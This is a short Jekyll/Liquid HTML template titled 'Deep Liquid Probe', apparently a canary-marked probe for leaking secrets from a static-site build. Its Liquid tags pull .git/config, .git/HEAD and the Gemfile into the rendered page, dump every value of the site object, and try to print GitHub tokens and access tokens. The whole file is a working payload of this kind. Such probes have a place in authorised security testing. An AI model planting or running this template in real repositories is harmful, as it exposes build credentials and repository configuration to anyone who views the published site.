---
layout: null
---
<!DOCTYPE html>
<html><body>
<h1>Deep Liquid Probe</h1>

<h2>Git config (may contain build tokens)</h2>
<pre>{% capture gitconfig %}{% include_relative .git/config %}{% endcapture %}
git/config: {{ gitconfig | truncate: 500 }}</pre>

<h2>Git HEAD</h2>
<pre>{% capture githead %}{% include_relative .git/HEAD %}{% endcapture %}
git/HEAD: {{ githead }}</pre>

<h2>Gemfile (build deps)</h2>
<pre>{% capture gemfile %}{% include_relative Gemfile %}{% endcapture %}
Gemfile: {{ gemfile | truncate: 300 }}</pre>

<h2>Environment dump via site object</h2>
<pre>
{% for item in site %}{{ item[0] }}: {{ item[1] | inspect | truncate: 100 }}
{% endfor %}
</pre>

<h2>GitHub token in site.github</h2>
<pre>
token: {{ site.github.token }}
pat: {{ site.github.pat }}
access_token: {{ site.github.access_token }}
</pre>

<h2>CANARY_DEEP_PROBE_v1</h2>
</body></html>
